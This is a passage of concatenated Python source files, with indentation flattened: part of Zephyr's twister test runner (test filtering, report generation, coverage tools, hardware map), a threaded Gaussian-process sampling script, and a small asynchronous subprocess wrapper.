a = set(platform_scope)
b = set(filter(lambda item: item.name in tc.platform_allow, self.platforms))
c = a.intersection(b)
if not c:
platform_scope = list(filter(lambda item: item.name in tc.platform_allow, \
self.platforms))
# list of instances per testcase, aka configurations.
instance_list = []
for plat in platform_scope:
instance = TestInstance(tc, plat, self.outdir)
if runnable:
tfilter = 'runnable'
else:
tfilter = 'buildable'
instance.run = instance.check_runnable(
self.enable_slow,
tfilter,
self.fixtures
)
for t in tc.cases:
instance.results[t] = None
if runnable and self.duts:
for h in self.duts:
if h.platform == plat.name:
if tc.harness_config.get('fixture') in h.fixtures:
instance.run = True
if not force_platform and plat.name in exclude_platform:
discards[instance] = discards.get(instance, "Platform is excluded on command line.")
if (plat.arch == "unit") != (tc.type == "unit"):
# Discard silently
continue
if runnable and not instance.run:
discards[instance] = discards.get(instance, "Not runnable on device")
if self.integration and tc.integration_platforms and plat.name not in tc.integration_platforms:
discards[instance] = discards.get(instance, "Not part of integration platforms")
if tc.skip:
discards[instance] = discards.get(instance, "Skip filter")
if tag_filter and not tc.tags.intersection(tag_filter):
discards[instance] = discards.get(instance, "Command line testcase tag filter")
if exclude_tag and tc.tags.intersection(exclude_tag):
discards[instance] = discards.get(instance, "Command line testcase exclude filter")
if testcase_filter and tc_name not in testcase_filter:
discards[instance] = discards.get(instance, "Testcase name filter")
if arch_filter and plat.arch not in arch_filter:
discards[instance] = discards.get(instance, "Command line testcase arch filter")
if not force_platform:
if tc.arch_allow and plat.arch not in tc.arch_allow:
discards[instance] = discards.get(instance, "Not in test case arch allow list")
if tc.arch_exclude and plat.arch in tc.arch_exclude:
discards[instance] = discards.get(instance, "In test case arch exclude")
if tc.platform_exclude and plat.name in tc.platform_exclude:
discards[instance] = discards.get(instance, "In test case platform exclude")
if tc.toolchain_exclude and toolchain in tc.toolchain_exclude:
discards[instance] = discards.get(instance, "In test case toolchain exclude")
if platform_filter and plat.name not in platform_filter:
discards[instance] = discards.get(instance, "Command line platform filter")
if tc.platform_allow and plat.name not in tc.platform_allow:
discards[instance] = discards.get(instance, "Not in testcase platform allow list")
if tc.toolchain_allow and toolchain not in tc.toolchain_allow:
discards[instance] = discards.get(instance, "Not in testcase toolchain allow list")
if not plat.env_satisfied:
discards[instance] = discards.get(instance, "Environment ({}) not satisfied".format(", ".join(plat.env)))
if not force_toolchain \
and toolchain and (toolchain not in plat.supported_toolchains) \
and tc.type != 'unit':
discards[instance] = discards.get(instance, "Not supported by the toolchain")
if plat.ram < tc.min_ram:
discards[instance] = discards.get(instance, "Not enough RAM")
if tc.depends_on:
dep_intersection = tc.depends_on.intersection(set(plat.supported))
if dep_intersection != set(tc.depends_on):
discards[instance] = discards.get(instance, "No hardware support")
if plat.flash < tc.min_flash:
discards[instance] = discards.get(instance, "Not enough FLASH")
if set(plat.ignore_tags) & tc.tags:
discards[instance] = discards.get(instance, "Excluded tags per platform (exclude_tags)")
if plat.only_tags and not set(plat.only_tags) & tc.tags:
discards[instance] = discards.get(instance, "Excluded tags per platform (only_tags)")
test_configuration = ".".join([instance.platform.name,
instance.testcase.id])
# skip quarantined tests
if test_configuration in self.quarantine and not self.quarantine_verify:
discards[instance] = discards.get(instance,
f"Quarantine: {self.quarantine[test_configuration]}")
# run only quarantined test to verify their statuses (skip everything else)
if self.quarantine_verify and test_configuration not in self.quarantine:
discards[instance] = discards.get(instance, "Not under quarantine")
# if nothing stopped us until now, it means this configuration
# needs to be added.
instance_list.append(instance)
# no configurations, so jump to next testcase
if not instance_list:
continue
# if twister was launched with no platform options at all, we
# take all default platforms
if default_platforms and not tc.build_on_all and not integration:
if tc.platform_allow:
a = set(self.default_platforms)
b = set(tc.platform_allow)
c = a.intersection(b)
if c:
aa = list(filter(lambda tc: tc.platform.name in c, instance_list))
self.add_instances(aa)
else:
self.add_instances(instance_list)
else:
instances = list(filter(lambda tc: tc.platform.default, instance_list))
self.add_instances(instances)
elif integration:
instances = list(filter(lambda item: item.platform.name in tc.integration_platforms, instance_list))
self.add_instances(instances)
elif emulation_platforms:
self.add_instances(instance_list)
for instance in list(filter(lambda inst: not inst.platform.simulation != 'na', instance_list)):
discards[instance] = discards.get(instance, "Not an emulated platform")
else:
self.add_instances(instance_list)
for _, case in self.instances.items():
case.create_overlay(case.platform, self.enable_asan, self.enable_ubsan, self.enable_coverage, self.coverage_platform)
self.discards = discards
self.selected_platforms = set(p.platform.name for p in self.instances.values())
for instance in self.discards:
instance.reason = self.discards[instance]
# If integration mode is on all skips on integration_platforms are treated as errors.
# TODO: add quarantine relief here when PR with quarantine feature gets merged
if self.integration and instance.platform.name in instance.testcase.integration_platforms:
instance.status = "error"
instance.reason += " but is one of the integration platforms"
instance.fill_results_by_status()
self.instances[instance.name] = instance
else:
instance.status = "skipped"
instance.fill_results_by_status()
self.filtered_platforms = set(p.platform.name for p in self.instances.values()
if p.status != "skipped" )
return discards
def add_instances(self, instance_list):
for instance in instance_list:
self.instances[instance.name] = instance
@staticmethod
def calc_one_elf_size(instance):
if instance.status not in ["error", "failed", "skipped"]:
if instance.platform.type != "native":
size_calc = instance.calculate_sizes()
instance.metrics["ram_size"] = size_calc.get_ram_size()
instance.metrics["rom_size"] = size_calc.get_rom_size()
instance.metrics["unrecognized"] = size_calc.unrecognized_sections()
else:
instance.metrics["ram_size"] = 0
instance.metrics["rom_size"] = 0
instance.metrics["unrecognized"] = []
instance.metrics["handler_time"] = instance.handler.duration if instance.handler else 0
def add_tasks_to_queue(self, pipeline, build_only=False, test_only=False):
for instance in self.instances.values():
if build_only:
instance.run = False
if test_only and instance.run:
pipeline.put({"op": "run", "test": instance})
else:
if instance.status not in ['passed', 'skipped', 'error']:
logger.debug(f"adding {instance.name}")
instance.status = None
pipeline.put({"op": "cmake", "test": instance})
# If the instance got 'error' status before, proceed to the report stage
if instance.status == "error":
pipeline.put({"op": "report", "test": instance})
def pipeline_mgr(self, pipeline, done_queue, lock, results):
while True:
try:
task = pipeline.get_nowait()
except queue.Empty:
break
else:
test = task['test']
pb = ProjectBuilder(self,
test,
lsan=self.enable_lsan,
asan=self.enable_asan,
ubsan=self.enable_ubsan,
coverage=self.enable_coverage,
extra_args=self.extra_args,
device_testing=self.device_testing,
cmake_only=self.cmake_only,
cleanup=self.cleanup,
valgrind=self.enable_valgrind,
inline_logs=self.inline_logs,
generator=self.generator,
generator_cmd=self.generator_cmd,
verbose=self.verbose,
warnings_as_errors=self.warnings_as_errors,
overflow_as_errors=self.overflow_as_errors
)
pb.process(pipeline, done_queue, task, lock, results)
return True
def execute(self, pipeline, done, results):
lock = Lock()
logger.info("Adding tasks to the queue...")
self.add_tasks_to_queue(pipeline, self.build_only, self.test_only)
logger.info("Added initial list of jobs to queue")
processes = []
for job in range(self.jobs):
logger.debug(f"Launch process {job}")
p = Process(target=self.pipeline_mgr, args=(pipeline, done, lock, results, ))
processes.append(p)
p.start()
try:
for p in processes:
p.join()
except KeyboardInterrupt:
logger.info("Execution interrupted")
for p in processes:
p.terminate()
# FIXME: This needs to move out.
if self.enable_size_report and not self.cmake_only:
# Parallelize size calculation
executor = concurrent.futures.ThreadPoolExecutor(self.jobs)
futures = [executor.submit(self.calc_one_elf_size, instance)
for instance in self.instances.values()]
concurrent.futures.wait(futures)
else:
for instance in self.instances.values():
instance.metrics["ram_size"] = 0
instance.metrics["rom_size"] = 0
instance.metrics["handler_time"] = instance.handler.duration if instance.handler else 0
instance.metrics["unrecognized"] = []
return results
def discard_report(self, filename):
try:
if not self.discards:
raise TwisterRuntimeError("apply_filters() hasn't been run!")
except Exception as e:
logger.error(str(e))
sys.exit(2)
with open(filename, "wt") as csvfile:
fieldnames = ["test", "arch", "platform", "reason"]
cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
cw.writeheader()
for instance, reason in sorted(self.discards.items()):
rowdict = {"test": instance.testcase.name,
"arch": instance.platform.arch,
"platform": instance.platform.name,
"reason": reason}
cw.writerow(rowdict)
def target_report(self, outdir, suffix, append=False):
platforms = {inst.platform.name for _, inst in self.instances.items()}
for platform in platforms:
if suffix:
filename = os.path.join(outdir,"{}_{}.xml".format(platform, suffix))
else:
filename = os.path.join(outdir,"{}.xml".format(platform))
self.xunit_report(filename, platform, full_report=True,
append=append, version=self.version)
@staticmethod
def process_log(log_file):
filtered_string = ""
if os.path.exists(log_file):
with open(log_file, "rb") as f:
log = f.read().decode("utf-8")
filtered_string = ''.join(filter(lambda x: x in string.printable, log))
return filtered_string
def xunit_report(self, filename, platform=None, full_report=False, append=False, version="NA"):
total = 0
fails = passes = errors = skips = 0
if platform:
selected = [platform]
logger.info(f"Writing target report for {platform}...")
else:
logger.info(f"Writing xunit report {filename}...")
selected = self.selected_platforms
if os.path.exists(filename) and append:
tree = ET.parse(filename)
eleTestsuites = tree.getroot()
else:
eleTestsuites = ET.Element('testsuites')
for p in selected:
inst = self.get_platform_instances(p)
fails = 0
passes = 0
errors = 0
skips = 0
duration = 0
for _, instance in inst.items():
handler_time = instance.metrics.get('handler_time', 0)
duration += handler_time
if full_report and instance.run:
for k in instance.results.keys():
if instance.results[k] == 'PASS':
passes += 1
elif instance.results[k] == 'BLOCK':
errors += 1
elif instance.results[k] == 'SKIP' or instance.status in ['skipped']:
skips += 1
else:
fails += 1
else:
if instance.status in ["error", "failed", "timeout", "flash_error"]:
if instance.reason in ['build_error', 'handler_crash']:
errors += 1
else:
fails += 1
elif instance.status == 'skipped':
skips += 1
elif instance.status == 'passed':
passes += 1
else:
if instance.status:
logger.error(f"{instance.name}: Unknown status {instance.status}")
else:
logger.error(f"{instance.name}: No status")
total = (errors + passes + fails + skips)
# do not produce a report if no tests were actually run (only built)
if total == 0:
continue
run = p
eleTestsuite = None
# When we re-run the tests, we re-use the results and update only with
# the newly run tests.
if os.path.exists(filename) and append:
ts = eleTestsuites.findall(f'testsuite/[@name="{p}"]')
if ts:
eleTestsuite = ts[0]
eleTestsuite.attrib['failures'] = "%d" % fails
eleTestsuite.attrib['errors'] = "%d" % errors
eleTestsuite.attrib['skipped'] = "%d" % skips
else:
logger.info(f"Did not find any existing results for {p}")
eleTestsuite = ET.SubElement(eleTestsuites, 'testsuite',
name=run, time="%f" % duration,
tests="%d" % (total),
failures="%d" % fails,
errors="%d" % (errors), skipped="%s" % (skips))
eleTSPropetries = ET.SubElement(eleTestsuite, 'properties')
# Multiple 'property' can be added to 'properties'
# differing by name and value
ET.SubElement(eleTSPropetries, 'property', name="version", value=version)
else:
eleTestsuite = ET.SubElement(eleTestsuites, 'testsuite',
name=run, time="%f" % duration,
tests="%d" % (total),
failures="%d" % fails,
errors="%d" % (errors), skipped="%s" % (skips))
eleTSPropetries = ET.SubElement(eleTestsuite, 'properties')
# Multiple 'property' can be added to 'properties'
# differing by name and value
ET.SubElement(eleTSPropetries, 'property', name="version", value=version)
for _, instance in inst.items():
if full_report:
tname = os.path.basename(instance.testcase.name)
else:
tname = instance.testcase.id
handler_time = instance.metrics.get('handler_time', 0)
if full_report:
for k in instance.results.keys():
# remove testcases that are being re-run from exiting reports
for tc in eleTestsuite.findall(f'testcase/[@name="{k}"]'):
eleTestsuite.remove(tc)
classname = ".".join(tname.split(".")[:2])
eleTestcase = ET.SubElement(
eleTestsuite, 'testcase',
classname=classname,
name="%s" % (k), time="%f" % handler_time)
if instance.results[k] in ['FAIL', 'BLOCK'] or \
(not instance.run and instance.status in ["error", "failed", "timeout"]):
if instance.results[k] == 'FAIL':
el = ET.SubElement(
eleTestcase,
'failure',
type="failure",
message="failed")
else:
el = ET.SubElement(
eleTestcase,
'error',
type="failure",
message=instance.reason)
log_root = os.path.join(self.outdir, instance.platform.name, instance.testcase.name)
log_file = os.path.join(log_root, "handler.log")
el.text = self.process_log(log_file)
elif instance.results[k] == 'PASS' \
or (not instance.run and instance.status in ["passed"]):
pass
elif instance.results[k] == 'SKIP' or (instance.status in ["skipped"]):
el = ET.SubElement(eleTestcase, 'skipped', type="skipped", message=instance.reason)
else:
el = ET.SubElement(
eleTestcase,
'error',
type="error",
message=f"{instance.reason}")
else:
if platform:
classname = ".".join(instance.testcase.name.split(".")[:2])
else:
classname = p + ":" + ".".join(instance.testcase.name.split(".")[:2])
# remove testcases that are being re-run from exiting reports
for tc in eleTestsuite.findall(f'testcase/[@classname="{classname}"][@name="{instance.testcase.name}"]'):
eleTestsuite.remove(tc)
eleTestcase = ET.SubElement(eleTestsuite, 'testcase',
classname=classname,
name="%s" % (instance.testcase.name),
time="%f" % handler_time)
if instance.status in ["error", "failed", "timeout", "flash_error"]:
failure = ET.SubElement(
eleTestcase,
'failure',
type="failure",
message=instance.reason)
log_root = ("%s/%s/%s" % (self.outdir, instance.platform.name, instance.testcase.name))
bl = os.path.join(log_root, "build.log")
hl = os.path.join(log_root, "handler.log")
log_file = bl
if instance.reason != 'Build error':
if os.path.exists(hl):
log_file = hl
else:
log_file = bl
failure.text = self.process_log(log_file)
elif instance.status == "skipped":
ET.SubElement(eleTestcase, 'skipped', type="skipped", message="Skipped")
result = ET.tostring(eleTestsuites)
with open(filename, 'wb') as report:
report.write(result)
return fails, passes, errors, skips
def csv_report(self, filename):
with open(filename, "wt") as csvfile:
fieldnames = ["test", "arch", "platform", "status",
"extra_args", "handler", "handler_time", "ram_size",
"rom_size"]
cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
cw.writeheader()
for instance in self.instances.values():
rowdict = {"test": instance.testcase.name,
"arch": instance.platform.arch,
"platform": instance.platform.name,
"extra_args": " ".join(instance.testcase.extra_args),
"handler": instance.platform.simulation}
rowdict["status"] = instance.status
if instance.status not in ["error", "failed", "timeout"]:
if instance.handler:
rowdict["handler_time"] = instance.metrics.get("handler_time", 0)
ram_size = instance.metrics.get("ram_size", 0)
rom_size = instance.metrics.get("rom_size", 0)
rowdict["ram_size"] = ram_size
rowdict["rom_size"] = rom_size
cw.writerow(rowdict)
def json_report(self, filename, append=False, version="NA"):
logger.info(f"Writing JSON report {filename}")
report = {}
selected = self.selected_platforms
report["environment"] = {"os": os.name,
"zephyr_version": version,
"toolchain": self.get_toolchain()
}
json_data = {}
if os.path.exists(filename) and append:
with open(filename, 'r') as json_file:
json_data = json.load(json_file)
suites = json_data.get("testsuites", [])
if suites:
suite = suites[0]
testcases = suite.get("testcases", [])
else:
suite = {}
testcases = []
for p in selected:
inst = self.get_platform_instances(p)
for _, instance in inst.items():
testcase = {}
handler_log = os.path.join(instance.build_dir, "handler.log")
build_log = os.path.join(instance.build_dir, "build.log")
device_log = os.path.join(instance.build_dir, "device.log")
handler_time = instance.metrics.get('handler_time', 0)
ram_size = instance.metrics.get ("ram_size", 0)
rom_size = instance.metrics.get("rom_size",0)
for k in instance.results.keys():
testcases = list(filter(lambda d: not (d.get('testcase') == k and d.get('platform') == p), testcases ))
testcase = {"testcase": k,
"arch": instance.platform.arch,
"platform": p,
}
if ram_size:
testcase["ram_size"] = ram_size
if rom_size:
testcase["rom_size"] = rom_size
if instance.results[k] in ["PASS"]:
testcase["status"] = "passed"
if instance.handler:
testcase["execution_time"] = handler_time
elif instance.results[k] in ['FAIL', 'BLOCK'] or instance.status in ["error", "failed", "timeout"]:
testcase["status"] = "failed"
testcase["reason"] = instance.reason
testcase["execution_time"] = handler_time
if os.path.exists(handler_log):
testcase["test_output"] = self.process_log(handler_log)
elif os.path.exists(device_log):
testcase["device_log"] = self.process_log(device_log)
else:
testcase["build_log"] = self.process_log(build_log)
else:
testcase["status"] = "skipped"
testcase["reason"] = instance.reason
testcases.append(testcase)
suites = [ {"testcases": testcases} ]
report["testsuites"] = suites
with open(filename, "wt") as json_file:
json.dump(report, json_file, indent=4, separators=(',',':'))
def get_testcase(self, identifier):
results = []
for _, tc in self.testcases.items():
for case in tc.cases:
if case == identifier:
results.append(tc)
return results
class CoverageTool:
""" Base class for every supported coverage tool
"""
def __init__(self):
self.gcov_tool = None
self.base_dir = None
@staticmethod
def factory(tool):
if tool == 'lcov':
t = Lcov()
elif tool == 'gcovr':
t = Gcovr()
else:
logger.error("Unsupported coverage tool specified: {}".format(tool))
return None
logger.debug(f"Select {tool} as the coverage tool...")
return t
@staticmethod
def retrieve_gcov_data(intput_file):
logger.debug("Working on %s" % intput_file)
extracted_coverage_info = {}
capture_data = False
capture_complete = False
with open(intput_file, 'r') as fp:
for line in fp.readlines():
if re.search("GCOV_COVERAGE_DUMP_START", line):
capture_data = True
continue
if re.search("GCOV_COVERAGE_DUMP_END", line):
capture_complete = True
break
# Loop until the coverage data is found.
if not capture_data:
continue
if line.startswith("*"):
sp = line.split("<")
if len(sp) > 1:
# Remove the leading delimiter "*"
file_name = sp[0][1:]
# Remove the trailing new line char
hex_dump = sp[1][:-1]
else:
continue
else:
continue
extracted_coverage_info.update({file_name: hex_dump})
if not capture_data:
capture_complete = True
return {'complete': capture_complete, 'data': extracted_coverage_info}
@staticmethod
def create_gcda_files(extracted_coverage_info):
logger.debug("Generating gcda files")
for filename, hexdump_val in extracted_coverage_info.items():
# if kobject_hash is given for coverage gcovr fails
# hence skipping it problem only in gcovr v4.1
if "kobject_hash" in filename:
filename = (filename[:-4]) + "gcno"
try:
os.remove(filename)
except Exception:
pass
continue
with open(filename, 'wb') as fp:
fp.write(bytes.fromhex(hexdump_val))
def generate(self, outdir):
for filename in glob.glob("%s/**/handler.log" % outdir, recursive=True):
gcov_data = self.__class__.retrieve_gcov_data(filename)
capture_complete = gcov_data['complete']
extracted_coverage_info = gcov_data['data']
if capture_complete:
self.__class__.create_gcda_files(extracted_coverage_info)
logger.debug("Gcov data captured: {}".format(filename))
else:
logger.error("Gcov data capture incomplete: {}".format(filename))
with open(os.path.join(outdir, "coverage.log"), "a") as coveragelog:
ret = self._generate(outdir, coveragelog)
if ret == 0:
logger.info("HTML report generated: {}".format(
os.path.join(outdir, "coverage", "index.html")))
class Lcov(CoverageTool):
def __init__(self):
super().__init__()
self.ignores = []
def add_ignore_file(self, pattern):
self.ignores.append('*' + pattern + '*')
def add_ignore_directory(self, pattern):
self.ignores.append('*/' + pattern + '/*')
def _generate(self, outdir, coveragelog):
coveragefile = os.path.join(outdir, "coverage.info")
ztestfile = os.path.join(outdir, "ztest.info")
cmd = ["lcov", "--gcov-tool", self.gcov_tool,
"--capture", "--directory", outdir,
"--rc", "lcov_branch_coverage=1",
"--output-file", coveragefile]
cmd_str = " ".join(cmd)
logger.debug(f"Running {cmd_str}...")
subprocess.call(cmd, stdout=coveragelog)
# We want to remove tests/* and tests/ztest/test/* but save tests/ztest
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--extract",
coveragefile,
os.path.join(self.base_dir, "tests", "ztest", "*"),
"--output-file", ztestfile,
"--rc", "lcov_branch_coverage=1"], stdout=coveragelog)
if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0:
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--remove",
ztestfile,
os.path.join(self.base_dir, "tests/ztest/test/*"),
"--output-file", ztestfile,
"--rc", "lcov_branch_coverage=1"],
stdout=coveragelog)
files = [coveragefile, ztestfile]
else:
files = [coveragefile]
for i in self.ignores:
subprocess.call(
["lcov", "--gcov-tool", self.gcov_tool, "--remove",
coveragefile, i, "--output-file",
coveragefile, "--rc", "lcov_branch_coverage=1"],
stdout=coveragelog)
# The --ignore-errors source option is added to avoid it exiting due to
# samples/application_development/external_lib/
return subprocess.call(["genhtml", "--legend", "--branch-coverage",
"--ignore-errors", "source",
"-output-directory",
os.path.join(outdir, "coverage")] + files,
stdout=coveragelog)
class Gcovr(CoverageTool):
def __init__(self):
super().__init__()
self.ignores = []
def add_ignore_file(self, pattern):
self.ignores.append('.*' + pattern + '.*')
def add_ignore_directory(self, pattern):
self.ignores.append(".*/" + pattern + '/.*')
@staticmethod
def _interleave_list(prefix, list):
tuple_list = [(prefix, item) for item in list]
return [item for sublist in tuple_list for item in sublist]
def _generate(self, outdir, coveragelog):
coveragefile = os.path.join(outdir, "coverage.json")
ztestfile = os.path.join(outdir, "ztest.json")
excludes = Gcovr._interleave_list("-e", self.ignores)
# We want to remove tests/* and tests/ztest/test/* but save tests/ztest
cmd = ["gcovr", "-r", self.base_dir, "--gcov-executable",
self.gcov_tool, "-e", "tests/*"] + excludes + ["--json", "-o",
coveragefile, outdir]
cmd_str = " ".join(cmd)
logger.debug(f"Running {cmd_str}...")
subprocess.call(cmd, stdout=coveragelog)
subprocess.call(["gcovr", "-r", self.base_dir, "--gcov-executable",
self.gcov_tool, "-f", "tests/ztest", "-e",
"tests/ztest/test/*", "--json", "-o", ztestfile,
outdir], stdout=coveragelog)
if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0:
files = [coveragefile, ztestfile]
else:
files = [coveragefile]
subdir = os.path.join(outdir, "coverage")
os.makedirs(subdir, exist_ok=True)
tracefiles = self._interleave_list("--add-tracefile", files)
return subprocess.call(["gcovr", "-r", self.base_dir, "--html",
"--html-details"] + tracefiles +
["-o", os.path.join(subdir, "index.html")],
stdout=coveragelog)
class DUT(object):
def __init__(self,
id=None,
serial=None,
platform=None,
product=None,
serial_pty=None,
connected=False,
pre_script=None,
post_script=None,
post_flash_script=None,
runner=None):
self.serial = serial
self.platform = platform
self.serial_pty = serial_pty
self._counter = Value("i", 0)
self._available = Value("i", 1)
self.connected = connected
self.pre_script = pre_script
self.id = id
self.product = product
self.runner = runner
self.fixtures = []
self.post_flash_script = post_flash_script
self.post_script = post_script
self.pre_script = pre_script
self.probe_id = None
self.notes = None
self.lock = Lock()
self.match = False
@property
def available(self):
with self._available.get_lock():
return self._available.value
@available.setter
def available(self, value):
with self._available.get_lock():
self._available.value = value
@property
def counter(self):
with self._counter.get_lock():
return self._counter.value
@counter.setter
def counter(self, value):
with self._counter.get_lock():
self._counter.value = value
def to_dict(self):
d = {}
exclude = ['_available', '_counter', 'match']
v = vars(self)
for k in v.keys():
if k not in exclude and v[k]:
d[k] = v[k]
return d
def __repr__(self):
return f"<{self.platform} ({self.product}) on {self.serial}>"
class HardwareMap:
schema_path = os.path.join(ZEPHYR_BASE, "scripts", "schemas", "twister", "hwmap-schema.yaml")
manufacturer = [
'ARM',
'SEGGER',
'MBED',
'STMicroelectronics',
'Atmel Corp.',
'Texas Instruments',
'Silicon Labs',
'NXP Semiconductors',
'Microchip Technology Inc.',
'FTDI',
'Digilent'
]
runner_mapping = {
'pyocd': [
'DAPLink CMSIS-DAP',
'MBED CMSIS-DAP'
],
'jlink': [
'J-Link',
'J-Link OB'
],
'openocd': [
'STM32 STLink', '^XDS110.*', 'STLINK-V3'
],
'dediprog': [
'TTL232R-3V3',
'MCP2200 USB Serial Port Emulator'
]
}
def __init__(self):
self.detected = []
self.duts = []
def add_device(self, serial, platform, pre_script, is_pty):
device = DUT(platform=platform, connected=True, pre_script=pre_script)
if is_pty:
device.serial_pty = serial
else:
device.serial = serial
self.duts.append(device)
def load(self, map_file):
hwm_schema = scl.yaml_load(self.schema_path)
duts = scl.yaml_load_verify(map_file, hwm_schema)
for dut in duts:
pre_script = dut.get('pre_script')
post_script = dut.get('post_script')
post_flash_script = dut.get('post_flash_script')
platform = dut.get('platform')
id = dut.get('id')
runner = dut.get('runner')
serial = dut.get('serial')
product = dut.get('product')
fixtures = dut.get('fixtures', [])
new_dut = DUT(platform=platform,
product=product,
runner=runner,
id=id,
serial=serial,
connected=serial is not None,
pre_script=pre_script,
post_script=post_script,
post_flash_script=post_flash_script)
new_dut.fixtures = fixtures
new_dut.counter = 0
self.duts.append(new_dut)
def scan(self, persistent=False):
from serial.tools import list_ports
if persistent and platform.system() == 'Linux':
# On Linux, /dev/serial/by-id provides symlinks to
# '/dev/ttyACMx' nodes using names which are unique as
# long as manufacturers fill out USB metadata nicely.
#
# This creates a map from '/dev/ttyACMx' device nodes
# to '/dev/serial/by-id/usb-...' symlinks. The symlinks
# go into the hardware map because they stay the same
# even when the user unplugs / replugs the device.
#
# Some inexpensive USB/serial adapters don't result
# in unique names here, though, so use of this feature
# requires explicitly setting persistent=True.
by_id = Path('/dev/serial/by-id')
def readlink(link):
return str((by_id / link).resolve())
persistent_map = {readlink(link): str(link)
for link in by_id.iterdir()}
else:
persistent_map = {}
serial_devices = list_ports.comports()
logger.info("Scanning connected hardware...")
for d in serial_devices:
if d.manufacturer in self.manufacturer:
# TI XDS110 can have multiple serial devices for a single board
# assume endpoint 0 is the serial, skip all others
if d.manufacturer == 'Texas Instruments' and not d.location.endswith('0'):
continue
s_dev = DUT(platform="unknown",
id=d.serial_number,
serial=persistent_map.get(d.device, d.device),
product=d.product,
runner='unknown')
for runner, _ in self.runner_mapping.items():
products = self.runner_mapping.get(runner)
if d.product in products:
s_dev.runner = runner
continue
# Try regex matching
for p in products:
if re.match(p, d.product):
s_dev.runner = runner
s_dev.connected = True
self.detected.append(s_dev)
else:
logger.warning("Unsupported device (%s): %s" % (d.manufacturer, d))
def save(self, hwm_file):
# use existing map
self.detected.sort(key=lambda x: x.serial or '')
if os.path.exists(hwm_file):
with open(hwm_file, 'r') as yaml_file:
hwm = yaml.load(yaml_file, Loader=SafeLoader)
if hwm:
hwm.sort(key=lambda x: x['serial'] or '')
# disconnect everything
for h in hwm:
h['connected'] = False
h['serial'] = None
for _detected in self.detected:
for h in hwm:
if _detected.id == h['id'] and _detected.product == h['product'] and not _detected.match:
h['connected'] = True
h['serial'] = _detected.serial
_detected.match = True
new_duts = list(filter(lambda d: not d.match, self.detected))
new = []
for d in new_duts:
new.append(d.to_dict())
if hwm:
hwm = hwm + new
else:
hwm = new
with open(hwm_file, 'w') as yaml_file:
yaml.dump(hwm, yaml_file, Dumper=Dumper, default_flow_style=False)
self.load(hwm_file)
logger.info("Registered devices:")
self.dump()
else:
# create new file
dl = []
for _connected in self.detected:
platform = _connected.platform
id = _connected.id
runner = _connected.runner
serial = _connected.serial
product = _connected.product
d = {
'platform': platform,
'id': id,
'runner': runner,
'serial': serial,
'product': product
}
dl.append(d)
with open(hwm_file, 'w') as yaml_file:
yaml.dump(dl, yaml_file, Dumper=Dumper, default_flow_style=False)
logger.info("Detected devices:")
self.dump(detected=True)
def dump(self, filtered=[], header=[], connected_only=False, detected=False):
print("")
table = []
if detected:
to_show = self.detected
else:
to_show = self.duts
if not header:
header = ["Platform", "ID", "Serial device"]
for p in to_show:
platform = p.platform
connected = p.connected
if filtered and platform not in filtered:
continue
if not connected_only or connected:
table.append([platform, p.id, p.serial])
print(tabulate(table, headers=header, tablefmt="github"))
|
example.py
|
import threading
import matplotlib.pyplot as plt
import pickle
import time
import numpy as np
import cv2
import GaussianProcess
import util
from scipy import interpolate
plt.ion()
N = util.N
M = util.M
K = 2
# MAP = np.ones((N,M,K))/float(K)
MAP = lambda x, y: np.ones(K)/float(K)
# np.random.seed(0)
def Image_Classification_Thread(n = float('inf'), t=0.1):
print("YAY Image Classification Has Started!")
GaussianProcess.setup()
imageClassifier = pickle.load(open("Image_Classifier_Model.p", "rb"))
MAP = cv2.imread("MAP.png")
FEATURE_EXTRACTOR = lambda image: [image[:, :, 0].mean(), image[:, :, 1].mean(), image[:, :, 2].mean()]
i = 0
while True and i < n:
sample_location = (np.random.randint(0, N), np.random.randint(0, M))
image_sample = MAP[sample_location[0]*100:sample_location[0]*100+100,
sample_location[1]*100:sample_location[1]*100+100]
image_feature = FEATURE_EXTRACTOR(image_sample)
time.sleep(t)
P = imageClassifier.predict_proba(np.array([image_feature]))[0]
GaussianProcess.new_image(P, sample_location[0], sample_location[1])
i += 1
def Adaptive_Sampling_Thread():
print("YAY Adaptive Sampling Has Started!")
while True:
time.sleep(0.1)
global MAP
# MAP = GaussianProcess.get_image_map()
MAP = GaussianProcess.GPRegressor()
def main():
image = threading.Thread(name='image_class', target=Image_Classification_Thread)
sampling = threading.Thread(name='adaptive_sample', target=Adaptive_Sampling_Thread)
image.start()
sampling.start()
i = 0
while True:
plt.pause(1)
plt.clf()
MAP.visualize(0, file_path="images/yay{}.png".format(i))
i += 1
def experament(a_options=np.linspace(0,1,11), b_options=range(1,21), n=100):
"""
This function just finds optimal a and b values and plots the space
:param a_options: list options for a
:param b_options: list options for b
:param n: number of samples
:return: None
"""
np.random.seed(0)
Image_Classification_Thread(n, t=0)
data = np.zeros((len(a_options), len(b_options)))
min_NLL = float('inf')
optimal_params = (-1, -1)
for i, a in enumerate(a_options):
for j, b in enumerate(b_options):
MAP = GaussianProcess.get_image_map(a, b)
nll = util.get_NLL(MAP)
data[i, j] = nll
if nll < min_NLL:
optimal_params = (a, b)
min_NLL = nll
print("optimal a = {}, optimal b = {}".format(*optimal_params))
cm = plt.imshow(data)
plt.colorbar(cm)
plt.xticks(range(20), b_options)
plt.yticks(range(10), a_options)
plt.title("Negative Log Loss for values of a and b")
plt.xlabel("b")
plt.ylabel("a")
plt.show("hold")
# experament()
if __name__ == "__main__":
main()
|
async_task.py
|
import os
import subprocess
import threading
class AsyncTask:
encoding = "utf-8"
killed = False
proc = None
def __init__(self, command=["printf", "Hello"], cwd=None, output=print):
self.output = output
if self.proc is not None:
self.proc.terminate()
self.proc = None
self.proc = subprocess.Popen(
command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, cwd=cwd
)
self.killed = False
threading.Thread(target=self.read, args=(self.proc.stdout,)).start()
def enabled(self, kill=False):
if kill:
return self.proc is not None and self.proc.poll() is None
return False
def kill(self):
if self.proc:
self.killed = True
self.proc.terminate()
def read(self, handle):
chunk_size = 2 ** 13
out = b""
while True:
try:
data = os.read(handle.fileno(), chunk_size)
out += data
if len(data) == chunk_size:
continue
if data == b"" and out == b"":
raise IOError("EOF")
self.write(out.decode(self.encoding))
if data == b"":
raise IOError("EOF")
out = b""
except (UnicodeDecodeError) as e:
msg = "Error decoding output using %s - %s"
self.write(msg % (self.encoding, str(e)))
break
